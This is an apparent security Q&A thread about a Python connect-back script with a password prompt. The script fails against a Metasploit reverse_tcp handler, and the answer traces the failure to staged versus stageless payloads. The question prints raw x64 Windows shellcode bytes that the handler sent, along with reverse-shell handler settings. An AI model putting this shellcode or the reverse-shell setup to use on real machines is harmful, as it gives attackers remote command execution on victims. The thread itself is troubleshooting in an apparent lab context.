0

When I run my python script and use netcat -nvlp 4444 the connection establishes fine and I am able to use the functions.

When attempting to replicate this in metasploit I use set payload windows/x64/shell/reverse_tcp then I set the LHOST and LPORT and run the script on the victim machine. The connection establishes, but right after receiving Login: on my end, I get the error below.

I did some research and I think some bytes should be excluded such as the null ones but I am unsure if this is the issue or the correct way to fix the issue. One thing I am confused by is why pwd recieves anything if the script crashes before I have inputted the password.

When trying print(pwd) before decode: 

b'P\x01\x00\x00'
b'\xfcH\x83\xe4\xf0\xe8\xc0\x00\x00\x00AQAPRQVH1\xd2eH\x8bR`H\x8bR\x18H\x8bR H\x8brPH\x0f\xb7JJM1\xc9H1\xc0\xac<a|\x02, A\xc1\xc9\rA\x01\xc1\xe2\xedRAQH\x8bR \x8bB<H\x01\xd0\x8b\x80\x88\x00\x00\x00H\x85\xc0tgH\x01\xd0P\x8bH\x18D\x8b@ I\x01\xd0\xe3VH\xff\xc9A\x8b4\x88H\x01\xd6M1\xc9H1\xc0\xacA\xc1\xc9\rA\x01\xc18\xe0u\xf1L\x03L$\x08E9\xd1u\xd8XD\x8b@$I\x01\xd0fA\x8b\x0cHD\x8b@\x1cI\x01\xd0A\x8b\x04\x88H\x01\xd0AXAX^YZAXAYAZH\x83\xec AR\xff\xe0XAYZH\x8b\x12\xe9W\xff\xff\xff]I\xb8cmd\x00\x00\x00\x00\x00APAPH\x89\xe2WWWM1\xc0j\rYAP\xe2\xfcf\xc7D$T\x01\x01H\x8dD$\x18\xc6\x00hH\x89\xe6VPAPAPAPI\xff\xc0API\xff\xc8M\x89\xc1L\x89\xc1A\xbay\xcc?\x86\xff\xd5H1\xd2H\xff\xca\x8b\x0eA\xba\x08\x87\x1d`\xff\xd5\xbb\xf0\xb5\xa2VA\xba\xa6\x95\xbd\x9d\xff\xd5H\x83\xc4(<\x06|\n\x80\xfb\xe0u\x05\xbbG\x13roj\x00YA\x89\xda\xff\xd5'

errors: 

Traceback (most recent call last):
  File "C:\Users\13472\Desktop\folder\testh\testv5\testmod3Copy3.py", line 87, in <module>
    Login()
  File "C:\Users\13472\Desktop\folder\testh\testv5\testmod3Copy3.py", line 37, in Login
    pwd = pwd.decode("utf-8").strip()
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte

code snippet:

passwd = "Anything"

def Login():

    global s
    while True:
            string1=("Login: ")
            string1=string1.encode("utf-8")
            s.send(string1)
            pwd = s.recv(1024)
            pwd = pwd.decode("utf-8")


            if pwd.strip() == passwd:
                    break

            else:
                    continue

    string2=("You are connected! ")
    string2=string2.encode("utf-8")
    s.send(string2)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
Login()
schroeder
  • 123,438
  • 55
  • 284
  • 319
Volapiik Vyrient
  • 3
  • 2

1 Answers1

1

I believe the payload you are setting up in the metasploit handler is a staged payload (more info: https://metasploit.help.rapid7.com/docs/working-with-payloads). This means that the Python script is receiving the final stage but does not know how to handle it and, thus, crashing.

Try doing the same thing, but using a stageless payload such as windows/x64/shell_reverse_tcp instead and see if it works.

zyk
  • 399
  • 1
  • 2
  • 11
  • thanks for the input I'll give it a go – Volapiik Vyrient May 25 '20 at 17:36
  • After testing it seems no error pops up and on the recieving end I get up to "Command shell session 1 opened at 2020-05-26 02:10:57 -0400 " . However, nothing seems to happen afterwards, the prompt to login fails to appear and nothing else happens until I close the connection. – Volapiik Vyrient May 26 '20 at 06:16
  • I tested your snippet on my Kali box using `linux/x64/shell_reverse_tcp payload` within the `multi/handler `module and did get the "Login" prompt as expected (need to press enter to get it though). Once I entered the correct password the session ends (same behaviour as when tested using a simple netcat listener). – zyk May 26 '20 at 18:55
  • Thanks for getting back to me, ill give it another go and let you know how it goes(sorry for the slow updates college getting in the way) I was wondering do you think it would help if I gave you the full script? Not sure if the rest of my code impacts the connection in someway. – Volapiik Vyrient May 27 '20 at 17:19
  • I feel so stupid.....I followed your instructions, and turns out as I mentioned before at first nothing happens, but I pressed enter like you said and voila! the login prompt appears. Thanks for sticking with me throughout this! – Volapiik Vyrient May 28 '20 at 04:34
  • Been there, done that :) It happens even to the best of us. Glad you managed in the end. – zyk May 28 '20 at 15:29